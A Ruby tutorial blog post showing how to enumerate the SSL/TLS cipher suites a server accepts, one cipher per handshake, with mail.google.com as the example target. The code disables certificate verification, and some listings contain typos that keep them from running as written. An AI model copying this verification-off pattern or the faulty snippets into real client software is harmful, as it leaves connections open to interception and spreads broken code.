The first step of every SSL communication is SSL handshake. During SSL handshake, both client and server settle on a common cipher suite to be used for communication. Client initiated "Client Hello" provides server with all the cipher suites it supports. The server responds with the cipher suite it wants to use for communication in the Server Hello message. Image below shows list of cipher suites sent out to the webserver during Client Hello request.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQIIECmJFy6rL5J7v4K4URPWssFkslVetSdxjkdIAgtv6u6hyphenhyphen90LdLt_LkWt7BtVEQjuc3bPAJBmtur_L15_LhyLqRmTB0xE78EEoc6i3C9iIeXt3qG-W29wM5mGRIuhjUgy9dl5WDfwNb/s1600-h/OpenSSL_All_Ciphers.png"><img alt="" border="0" height="296" id="BLOGGER_PHOTO_ID_5380560967535877490" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQIIECmJFy6rL5J7v4K4URPWssFkslVetSdxjkdIAgtv6u6hyphenhyphen90LdLt_LkWt7BtVEQjuc3bPAJBmtur_L15_LhyLqRmTB0xE78EEoc6i3C9iIeXt3qG-W29wM5mGRIuhjUgy9dl5WDfwNb/s400/OpenSSL_All_Ciphers.png" style="height: 474px; margin: 0px auto 10px; text-align: center; width: 640px;" width="400" /></a><br />
<br />
To successfully enumerate supported SSL ciphers, we need to initiate SSL connection with only one cipher suite (for one protocol version) at a time and observe its response.<br />
<br />
<br />
<span style="font-weight: bold;">Initial housekeeping</span><br />
===============================<br />
<span style="font-family: courier new;"></span><br />
<ol>
<li>require 'net/https'</li>
<span style="font-family: courier new;"></span>
<li><span style="font-family: courier new;">target_url = "mail.google.com" # Target website</span><span style="font-family: courier new;"> </span></li>
<li><span style="font-family: courier new;">port = 443 # Target Port</span></li>
<li><span style="font-family: courier new;">protocol_versions = [:SSLv2, :SSLv3, :TLSv1] # Protocol versions support</span> </li>
</ol>
<br />
<span style="font-weight: bold;">Extending the HTTP Class</span><br />
===============================<br />
We will now extend the HTTP class to include two methods that will help us request application home page with one cipher suite at a time. Since classes in Ruby are not closed, we will extend the existing HTTP class. <br />
<ol>
<li><span style="font-family: courier new;">module Net</span></li>
<li><span style="font-family: courier new;">class HTTP</span></li>
<li><span style="font-family: courier new;">def set_context=(value)</span></li>
<li><span style="font-family: courier new;">@ssl_context = OpenSSL::SSL::SSLContext.new </span></li>
<li><span style="font-family: courier new;">@ssl_context &&= OpenSSL::SSL::SSLContext.new(value) </span></li>
<li><span style="font-family: courier new;">end</span></li>
<li><span style="font-family: courier new;">ssl_context_accessor :ciphers</span></li>
<li><span style="font-family: courier new;">end</span></li>
<li><span style="font-family: courier new;">end</span></li>
</ol>
<span style="font-weight: bold;">Lines 3-6:</span><br />
<span style="font-family: courier new;">def set_context=(value)</span><br />
<span style="font-family: courier new;">@ssl_context = OpenSSL::SSL::SSLContext.new </span><span style="font-family: courier new;"><br />
@ssl_context &&= OpenSSL::SSL::SSLContext.new(value) </span><span style="font-family: courier new;"><br />
end<br />
</span>The <span style="font-family: courier new;">set_context= </span>method helps us set context for one HTTP request. By setting context for a HTTP request, we enforce use of cipher suites and protocol version of our choice.<br />
<br />
<span style="font-weight: bold;">Line 8:</span><br />
<span style="font-family: courier new;">ssl_context_accessor :ciphers</span><br />
It creates two methods:<br />
<ol>
<li>ciphers : Return the cipher suite values used.</li>
<li>ciphers= : Set cipher suite for current request.</li>
</ol>
For more information about ssl_context_accessor, please refer to please refer to net/https.rb in you ruby installation directory.<br />
<br />
<br />
<span style="font-weight: bold;">Getting it work:</span><br />
===============================<br />
<ol>
<li><span style="font-family: courier new;">protocol_versions.each do |version| </span></li>
<li><span style="font-family: courier new;">cipher_set = OpenSSL::SSL::SSLContext.new(version).ciphers</span></li>
<li><span style="font-family: courier new;">puts "\n======================================="</span></li>
<li><span style="font-family: courier new;">puts version</span></li>
<li><span style="font-family: courier new;">puts "========================================="</span></li>
<li><span style="font-family: courier new;">cipher_set.each do |cipher_name, ignore_me_cipher_version, bits, ignore_me_algorithm_bits| </span></li>
<li><span style="font-family: courier new;">request = Net::HTTP.new(target_url, port)</span></li>
<li><span style="font-family: courier new;">request.use_ssl = true</span></li>
<li><span style="font-family: courier new;">request.set_context = version</span></li>
<li><span style="font-family: courier new;">request.verify_mode = OpenSSL::SSL::VERIFY_NONE</span></li>
<li><span style="font-family: courier new;">request.ciphers = cipher_name</span></li>
<li><span style="font-family: courier new;">beginresponse = request.get("/")</span></li>
<li><span style="font-family: courier new;">puts "[+] Accepted\t #{bits} bits\t#{cipher_name}"</span></li>
<li><span style="font-family: courier new;">rescue OpenSSL::SSL::SSLError => e</span></li>
<li><span style="font-family: courier new;">puts "[-] Rejected\t #{bits} bits\t#{cipher_name}"</span></li>
<li><span style="font-family: courier new;">rescue #Ignore all other Exceptions</span></li>
<li><span style="font-family: courier new;">end</span></li>
<li><span style="font-family: courier new;">end</span></li>
<li><span style="font-family: courier new;">end</span></li>
</ol>
<br />
<strong>Line 1:</strong><br />
<span style="font-family: courier new;">protocol_versions.each do |version|</span><br />
Loop through the cipher versions we are testing and pass on the value to the code block.<br />
<strong></strong><br />
<strong>Line 2:</strong><br />
<span style="font-family: courier new;">cipher_set = OpenSSL::SSL::SSLContext.new(version).ciphers</span><br />
Create new context for a give protocol version and return all the ciphers supported by OpenSSL version with which your ruby installation was compiled. The returned value is an array of array. Each element of the returned array is of following format: [name, version, bits, alg_bits]. Here <span style="font-weight: bold;">name</span> is cipher suite name, <span style="font-weight: bold;">version </span>is the protocol version (SSLv2, TLSv1/SSLv3), <span style="font-weight: bold;">bits</span> is key length in bits and <span style="font-weight: bold;">alg_bits</span> is the supported key length for the encryption algorithm.<br />
<br />
An example cipher suite array for SSLv2 protocol:<br />
<span style="font-family: courier new;">[<br />
["DES-CBC3-MD5", "SSLv2", 168, 168],<br />
["IDEA-CBC-MD5", "SSLv2", 128, 128],<br />
["RC2-CBC-MD5", "SSLv2", 128, 128],<br />
["RC4-MD5", "SSLv2", 128, 128],<br />
["DES-CBC-MD5", "SSLv2", 56, 56],<br />
["EXP-RC2-CBC-MD5", "SSLv2", 40, 128],<br />
["EXP-RC4-MD5", "SSLv2", 40, 128]<br />
]<br />
</span><br />
<strong>Line 7 and 8:</strong><br />
<span style="font-family: courier new;">request = Net::HTTP.new(target_url, port)</span><br />
<span style="font-family: courier new;">request.use_ssl = true</span><br />
Creates a new HTTP object and enables use of SSL for communication.<br />
<strong></strong><br />
<strong>Line 9: </strong><br />
<span style="font-family: courier new;">request.set_context = version</span><br />
Sets context of current request to protocol vesion provided. It is very important to set the right context when we want to restrict the cipher suites used. An example should be able to demonstrate it with more clarity.<br />
<br />
Consider following two code snips and corresponding packet capture in wireshark. For purpse of experimentation, a connection request was initiated to mail.google.com and "Client Hello" was observed using Wireshark for both the snips. It can be clearly seen in the screenshots that when context is not provided, it is possible that multiple cipher suites for a given cipher name can be chosen. In this case, "RC4-MD5" cipher suite is present in both TLSv1/SSLv3 and SSLv2. When context is not set to SSLv2 or TLSv1/SSLv3, the "Client Hello" will include two cipher suites; one for TLSv1/SSLv3 and other for SSLv2. This results in incorrect enumeration.<br />
<br />
For example, certain websites may not allow use of SSLv2. When connection attemps are made using "RC4-MD5" cipher without setting proper context, connection attempts might be successful because the "Client Hello" now contains an additional cipher suite for SSLv3/TLSv1. <br />
<br />
# == SNIP 1 Begins ===<br />
<span style="font-family: courier new;">request = Net::HTTP.new("mail.google.com", 443)</span><br />
<span style="font-family: courier new;">request.use_ssl = true</span><br />
<strong><span style="font-family: courier new;">request.set_context = :SSLv2</span> </strong><br />
<span style="font-family: courier new;">request.verify_mode = OpenSSL::SSL::VERIFY_NONE</span><br />
<span style="font-family: courier new;">request.ciphers = "RC4-MD5"</span><br />
<span style="font-family: courier new;">response = request.get("/")</span><br />
# == SNIP 1 ENDS ===<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFwqkzHA8O03M6o-QGU7EqaM-gBmQDCbP7PPIy9QTW36o8IvTkaENEbfn06SStmeoIM0J3P2KJMcBZjSmBBvg8YFLR12pZw2S-ClH3cZogqG9Y7SCTXq0ra3Vp7kWA1XfqCfrcb1OC-eZ9/s1600-h/RC4-MD5_with_context.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5380562449913791714" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiFwqkzHA8O03M6o-QGU7EqaM-gBmQDCbP7PPIy9QTW36o8IvTkaENEbfn06SStmeoIM0J3P2KJMcBZjSmBBvg8YFLR12pZw2S-ClH3cZogqG9Y7SCTXq0ra3Vp7kWA1XfqCfrcb1OC-eZ9/s320/RC4-MD5_with_context.png" style="cursor: hand; float: left; height: 147px; margin: 0px auto 10px; text-align: center; width: 320px;" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
# == SNIP 2 Begins ===<br />
<span style="font-family: courier new;">request = Net::HTTP.new("mail.google.com", 443)</span><br />
<span style="font-family: courier new;">request.use_ssl = true</span><br />
<span style="font-family: courier new;">request.verify_mode = OpenSSL::SSL::VERIFY_NONE</span><br />
<span style="font-family: courier new;">request.ciphers = "RC4-MD5"</span><br />
<span style="font-family: courier new;">request.get("/")</span><br />
# == SNIP 2 Ends ===<br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdvOGU3lV2JKrXz7SuVqLGKoAMgX_FlAg5Lnw3ZxZo5u97cmMU7hnRFLpKk4chPPKQVPpjCrl8wHWlF5Q_JLvTCh9_V5lccNAWXdJwTehIyh01GmWkF_G1NmiOkjms9gmwRPeu_QgbLPSn/s1600-h/RC4-MD5_without_context.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5380562978355659586" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhdvOGU3lV2JKrXz7SuVqLGKoAMgX_FlAg5Lnw3ZxZo5u97cmMU7hnRFLpKk4chPPKQVPpjCrl8wHWlF5Q_JLvTCh9_V5lccNAWXdJwTehIyh01GmWkF_G1NmiOkjms9gmwRPeu_QgbLPSn/s320/RC4-MD5_without_context.png" style="cursor: hand; float: left; height: 147px; margin: 0px 10px 10px 0px; width: 320px;" /></a><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
The only difference in Snip 1 and Snip 2 is context assignment call, <strong>request.set_context = :SSLv2</strong>.<br />
<br />
<br />
<strong>Line 10:<br />
</strong><span style="font-family: courier new;">request.verify_mode = OpenSSL::SSL::VERIFY_NONE<br />
</span>Prevents certificate verification. <br />
<br />
<strong>Line 11:</strong><br />
<span style="font-family: courier new;">request.ciphers = cipher_name<br />
</span>Sets request ciphers to provided cipher suite.<br />
<br />
<strong>Line 12 to 17:</strong><br />
<span style="font-family: courier new;">beginresponse = request.get("/")<br />
puts "[+] Accepted\t #{bits} bits\t#{cipher_name}"<br />
rescue OpenSSL::SSL::SSLError => e<br />
puts "[-] Rejected\t #{bits} bits\t#{cipher_name}"<br />
rescue #Ignore all other Exceptions<br />
end</span><br />
<span style="font-family: Courier New;"></span><br />
<br />
Attempt connection to the remote host and fetch the home page. <strong>OpenSSL::SSL::SSLError</strong> exception is raised when connection attempts fail due to cipher suite mismatch. All other exceptions are ignored. Success and failure of connection combined with exception decides if the cipher suite was supported or rejected.<br />
<br />
<br />
<br />
<strong>Putting it all together:<br />
</strong>===============================<br />
<span style="font-family: courier new;">require 'net/https'<br />
target_url = "mail.google.com"<br />
port = 443<br />
module Net <br />
class HTTP <br />
def set_context=(value) <br />
@ssl_context = OpenSSL::SSL::SSLContext.new #Create a new context <br />
@ssl_context &&= OpenSSL::SSL::SSLContext.new(value) <br />
end <br />
ssl_context_accessor :ciphers <br />
end<br />
end</span><br />
<span style="font-family: courier new;">protocol_versions.each do |version|<br />
cipher_set = OpenSSL::SSL::SSLContext.new(version).ciphers <br />
puts "\n============================================" <br />
puts version <br />
puts "============================================" <br />
cipher_set.each do |cipher_name, ignore_me_cipher_version, bits, ignore_me_algorithm_bits|<br />
request = Net::HTTP.new(target_url, port) <br />
request.use_ssl = true <br />
request.set_context = version <br />
request.ciphers = cipher_name <br />
request.verify_mode = OpenSSL::SSL::VERIFY_NONE <br />
begin <br />
response = request.get("/") <br />
puts "[+] Accepted\t #{bits} bits\t#{cipher_name}" <br />
rescue<br />
OpenSSL::SSL::SSLError => e <br />
puts "[-] Rejected\t #{bits} bits\t#{cipher_name}" <br />
rescue #Ignore all other Exceptions <br />
end <br />
end<br />
end</span><br />
<br />
<b>A Sample Run </b><br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKfQeZO0mNE1g1u5sDiNaPJ8Y-FcGMRhY164Va8j-VzVrKR3l6zMUJ1oMxiagxzSKIPxHFHjt0YzP22Ky15uA7KgZjaXO4sTobpgVgIRAiXqQPSl2SuWmwG8gnbFoHvZrR0lW4gX8lLc1L/s1600-h/SSLEnum_Sample_Run.png"><img alt="" border="0" id="BLOGGER_PHOTO_ID_5380566321625083106" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKfQeZO0mNE1g1u5sDiNaPJ8Y-FcGMRhY164Va8j-VzVrKR3l6zMUJ1oMxiagxzSKIPxHFHjt0YzP22Ky15uA7KgZjaXO4sTobpgVgIRAiXqQPSl2SuWmwG8gnbFoHvZrR0lW4gX8lLc1L/s400/SSLEnum_Sample_Run.png" style="cursor: hand; height: 400px; margin: 0px auto 10px; text-align: center; width: 270px;" /></a><br />
<br />
Let me know if you have any queries or comments. Thanks for stopping by..<br />
<br />
<b><u>Edit: Sep 23, 2013</u></b><br />
<span style="font-size: large;">Ruby 1.9</span><br />
Ruby 1.9 handles SSL Ciphers differently than 1.8. The corresponding code to modify Ruby library is available in my free tool SSLSmart's code base on <a href="https://github.com/gursev/sslsmart-1.0/blob/master/bin/sslsmartlib.rb">GitHub</a>.<br />
<div>
<br /></div>
</div>
Gursev Singh Kalrahttp://www.blogger.com/profile/11125392470187170013noreply@blogger.com4